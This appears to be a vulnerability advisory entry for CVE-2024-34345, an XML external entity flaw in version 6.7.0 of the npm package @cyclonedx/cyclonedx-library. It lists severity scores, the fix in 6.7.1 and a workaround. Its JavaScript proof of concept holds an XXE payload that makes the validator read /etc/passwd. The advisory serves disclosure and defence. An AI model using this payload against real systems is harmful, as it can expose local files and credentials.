CVE-2024-34345 – @cyclonedx/cyclonedx-library

Package

Manager: npm
Name: @cyclonedx/cyclonedx-library
Vulnerable Version: =6.7.0 || >=6.7.0 <6.7.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00058 pctl0.184

Details

@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability ### Impact XML External entity injections could be possible, when running the provided XML Validator on arbitrary input. #### POC ```js const { Spec: { Version }, Validation: { XmlValidator } } = require('@cyclonedx/cyclonedx-library'); const version = Version.v1dot5; const validator = new XmlValidator(version); const input = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE poc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <bom xmlns="http://cyclonedx.org/schema/bom/1.5"> <components> <component type="library"> <name>testing</name> <version>1.337</version> <licenses> <license> <id>&xxe;</id><!-- << XML external entity (XXE) injection --> </license> </licenses> </component> </components> </bom>`; // validating this forged(^) input might lead to unintended behaviour // for the fact that the XML external entity would be taken into account. validator.validate(input).then(ve => { console.error('validation error', ve); }); ``` ### Patches This issue was fixed in `@cyclonedx/cyclonedx-library@6.7.1 `. ### Workarounds Do not run the provided XML validator on untrusted inputs. ### References * issue was introduced via <https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063>.

Metadata

Created: 2024-05-08T19:55:37Z
Modified: 2024-05-14T20:01:46Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-38gf-rh2w-gmj7/GHSA-38gf-rh2w-gmj7.json
CWE IDs: ["CWE-611"]
Alternative ID: GHSA-38gf-rh2w-gmj7
Finding: F083
Auto approve: 1